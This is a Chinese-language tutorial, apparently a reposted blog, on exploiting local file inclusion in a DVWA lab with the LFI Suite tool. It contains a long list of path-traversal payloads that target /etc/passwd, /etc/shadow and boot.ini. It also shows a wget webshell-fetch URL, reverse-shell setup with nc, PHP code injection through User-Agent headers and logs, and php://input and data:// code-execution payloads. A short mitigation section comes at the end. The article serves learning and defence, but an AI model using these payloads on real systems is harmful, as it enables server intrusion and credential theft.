您好,登錄后才能下訂單哦!
今天在公眾號看到了一個本地文件包含的利用工具,看了下國外大牛對該工具的使用的一個視頻,感覺很厲害,通過該工具可對存在本地文件包含漏洞的站點進行利用并返回一個LFI shell,通過返回的LFI shell再次獲取一個反向連接,從而可執行相關命令,以前對本地文件包含的利用大多都停留在讀取文件,如果有遠程文件包含的話就可以getshell。這篇文章主要是對本地文件包含的一個簡單介紹及利用,主要是對工具的使用,也主要是記錄下該過程,方便以后查看,然后再抽時間研究下大神源代碼!大神請繞道而行!: )
文件包含漏洞主要是程序員把一些公用的代碼寫在一個單獨的文件中,然后使用其他文件進行包含調用,如果需要包含的文件是使用硬編碼的,那么一般是不會出現安全問題,但是有時可能不確定需要包含哪些具體文件,所以就會采用變量的形式來傳遞需要包含的文件,但是在使用包含文件的過程中,未對包含的變量進行檢查及過濾,導致外部提交的惡意數據作為變量進入到了文件包含的過程中,從而導致提交的惡意數據被執行。而文件包含通常分為本地文件包含(Local File Inclusion)和遠程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include為0n的情況認為是遠程文件包含漏洞,allow_url_fopen為off和 allow_url_include為0n為本地文件包含漏洞,如圖1 配置文件所示。本次主要是利用本地文件包含,所以將allow_url_fopen設置為了off。
圖1 php.ini配置
另外文件包含漏洞主要涉及到的危險函數主要是四個:include(),require()和include_once(),require_once()。
include():執行到include時才包含文件,找不到被包含文件時只會產生警告,腳本將繼續執行。
require():只要程序一運行就包含文件,找不到被包含的文件時會產生致命錯誤,并停止腳本。
include_once()和require_once():若文件中代碼已被包含則不會再次包含。(來自簡書)
通過文件包含漏洞,可以讀取系統中的敏感文件,源代碼文件等,如密碼文件,通過對密碼文件進行暴力破解,若破解成功則可獲取操作系統的用戶賬戶,甚至可通過開放的遠程連接服務進行連接控制;另外文件包含漏洞還可能導致執行任意代碼,不管本地文件包含還是遠程文件包含!
總之,常見的利用方法有以下三點:
一、讀取目標主機上的其他文件,主要是本地文件包含。
二、包含可運行的網頁***,主要是遠程文件包含,前提是"allow_url_fopen"是激活的(默認是激活的,沒幾個人會修改)。
三、包含一個創建文件的相應代碼文件,因為通過文件包含漏洞獲取的shell不是長久的,如果這個漏洞修補了,那么shell也不存在了,因此需要創建一個真實的shell。我們可以先包含一個可以執行cmd的偽shell,然后使用wget加-O參數(類似:
http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wgethttp://x.x.x.x/muma.txt -O muma.php)獲取一個真正的webshell。如果系統中沒有wget命令,獲取目錄不可寫,那么我們可以包含一個創建文件的腳本,然后通過腳本上傳***文件。
其實除了以上三點外,應該還有一點就是執行任意命令!
本次實驗環境主要是利用dvwa平臺進行演示,如圖2所示。DVWA(Damn Vulnerable Web Application)是用PHP+mysql編寫的一套web漏洞平臺,說簡單點就是所謂的網站漏洞靶機,該平臺包含了SQL注入、XSS、本地文件包含、命令執行等一些常見的web安全漏洞,并且該平臺是開源的,可以從官網直接下載。
圖2 dvwa平臺
本次主要使用的是LFI SUIT本地文件包含利用工具,是一款用python2.7編寫的神器,該適用于Windows,Linux 和 OS X,并且首次使用會自動配置,自動安裝需要的模塊,該工具提供了九種不同的文件包含***模塊,如圖3所示。另外當你通過一個可利用的***獲取到一個LFI shell后,你可以通過輸入“reverseshell”命令輕易地獲得一個反向shell。但是前提是你必須讓你的系統監聽反向連接,比如使用“nc –lvp port”。
圖3 九種不同的文件包含***模塊
在之前的本地文件包含漏洞中,大多數都是進行讀取文件,如linux下的密碼文件(../../../../etc/shadow以及../../../../etc/passwd),獲取讀取一些你知道物理路徑的一些文件,如圖4所示。
圖4 讀取已知路徑下的文件
以下是一些簡單的測試用例,根據實際情況進行適當的修改。在神器的目錄下也包含了很多測試用例,可自行查看!
../../tomcat/conf/tomcat-users.xml ../ %2e%2e%2f whichtranslates to ../ %2e%2e/ whichtranslates to ../ ..%2f whichtranslates to ../ %2e%2e%5c whichtranslates to ..\ %c1%1c %c0%9v %c0%af ..%5c../ ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/hosts ../../boot.ini /../../../../../../../../%2A ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/shadow%00 ../../../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow^^ /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\shadow /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow %00/etc/passwd%00 %00/etc/shadow%00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../../etc/passwd%00.html /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' ../../../../../../../../conf/server.xml /../../../../../../../../bin/id| C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/error_log /var/log/httpd/access_log /var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log /etc/httpd/logs/acces_log /etc/httpd/logs/acces.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache/access_log /var/log/apache/access.log /var/log/access_log /var/www/logs/error_log /var/www/logs/error.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /var/log/apache/error_log /var/log/apache/error.log /var/log/access_log /var/log/error_log ../../../WEB-INF/web.xml
直接使用pythonlfisuite.py,如圖5所示。此時我們選擇利用功能模塊1.
圖5 運行本地文件包含利用工具
在我們選擇利用功能模塊1后,會提示讓我們輸入cookie,如圖6所示:
圖6 設置cookie
瀏覽器F12console輸入document.cookie即可獲取到當前cookie,如圖7所示。
圖7 獲取cookie
輸入cookie后,我們隨便選擇一個***模塊試試,在此我們選擇3,選取***模塊后,我們輸入漏洞地址即可成功獲取到一個shell,如圖8所示。
圖8 成功獲取LFI shell
如果我們不知道那個***模塊可以返回shell,我們可以選擇自動***模塊。
圖9 自動***模塊
選擇之后我們需要選擇一個包含路徑的文件,我們選擇當前目錄下的一個文件即可。
圖10 選擇文件
選擇文件后該工具會嘗試可能性的路徑,并且加以利用。
圖11 選擇文件
如圖12所示,我們成功獲取了一個shell。
圖12 成功獲取shell
在我們已經獲取到的lfishell后,我們可以使用reverseshell來獲取一個反向連接,我們先進行監聽反向連接,如圖13所示。
圖13 設置監聽反向連接
我們輸入reverseshell后設置ip即可
圖14 設置ip及端口
此時我們也成功獲取到了一個反向連接,如圖15所示。
圖15 獲取到反向連接
另外我們也可以先使用掃描模塊,然后在選擇對應的***模塊也能成功獲取到LFI shell。使用方法與上面都是一樣的,再次就不再進行描述了。
這里主要是利用PHP的一些函數及偽協議的使用,通過查看PHP幫助文檔對這些模塊進行復現,與源代碼中的利用存在一定的差異,參考文檔。由于能力有限,其中兩個模塊完全失敗,/proc/self/fd以及phpinfo模塊,看了源代碼應該是利用phpinfo的一個注入來上傳一個包含PHP的代碼,從而進行實現,但是沒有利用成功。編程水平太差,誰能救救我!
通過訪問http://127.0.0.1/vulnerabilities/fi/?page=../../../../../../../../proc/self/environ查看是否可以包含/proc/self/environ文件,如果返回了環境變量信息則說明可以訪問,如果返回為空,那么一般是無法訪問。通過判斷可以訪問后,然后向User-Agent頭中注入PHP代碼(如<?php system(‘whoami’);?>)進行***,如果代碼被成功注入到User-Agent頭中,通過重新加載環境變量,最后會執行你的PHP代碼。由于無法添加該文件的訪問權限,因此沒有復現成功,另外需要主機是linux!
php://filter是PHP語言中特有的協議流,作用是作為一個“中間流”來處理其他流,因此我們可以結合php://input(見下文)來執行PHP代碼,如圖16,另外也可以將執行后的結果進行base64編碼輸入,如圖17。
圖16 php://filter執行PHP代碼
圖17 php://filter執行PHP代碼base64輸出
通過使用php://input然后輸入PHP代碼,然后就可以進行包含輸入的PHP代碼,如圖18所示,也可以通過PHP代碼進行wget一個***文件,從而可獲取一個webshell。但是使用該模塊,必須開啟包含url功能!
圖18 php://input執行PHP代碼
不知道如何利用,如果大牛路過,煩請多多指教!
這里主要是利用日志文件,我們訪問的get請求以及User-Agent會記錄到日志中,然后就可以構造一句話訪問,如圖19,也可以寫在User-Agent中,通過連接日志文件即可獲取到一句話,執行PHP代碼,如圖20,但是這里需要保證對日志文件有訪問權限,并且知道日志文件路勁,否則不能成功,可以先包含日志文件,看有沒有內容,如果沒有內容一般就是不能訪問!
圖19 將PHP代碼寫入到日志中
圖20 包含含有PHP代碼的日志文件
通過查看源代碼,好像是通過phpinfo注入,偽造提交一個含有PHP代碼的文件,從而執行PHP代碼,嘗試了下依舊不成功,哎,,,,,有時間繼續研究,路過的你知道的話,請多多指教!
這里主要是使用data://來打印內容,使用base64加密,如<?phpsystem('whoami');?>進行base64編碼,如圖21所示,然后使用data://來進行包含PHP代碼,data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==,從而可執行PHP代碼,如圖22。詳情請點擊此處。
圖21 對PHP代碼進行base64編碼
圖22 執行PHP代碼
expect://主要是用于處理交互式的流,由 expect:// 封裝協議打開的數據流 PTY 提供了對進程 stdio、stdout 和 stderr 的訪問。該封裝協議默認未開啟,為了使用expect:// 封裝器,你必須安裝PECL 上的Expect 擴展。由于某些原因,此模塊也沒有復現成功,另外該封裝協議默認不開啟,所以也沒有花時間進行復現了!詳情參考。
本文主要是對文件包含做了一個簡單的介紹,如文件包含漏洞的簡單原理及危害,最重要的是對本地文件包含漏洞的進一步利用,通過本地文件包含漏洞,從而獲取到一個反向連接或者是LFI shell。通過本文也讓自己對本地文件包含的危害和利用都有了一定的提高,不在是只停留在讀取文件上!
通過對該漏洞的利用,最安全的是設置allow_url_fopen和 allow_url_include為0ff,這樣就不能利用該漏洞了,另一方面可以做白名單限制,相當于是硬編碼,直接把需要包含的文件固定死,這樣既不會影響業務,也不會很輕松被利用,其次還是對用戶的輸入保持懷疑態度,對用戶的輸入變量進行嚴格的檢查及過濾!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。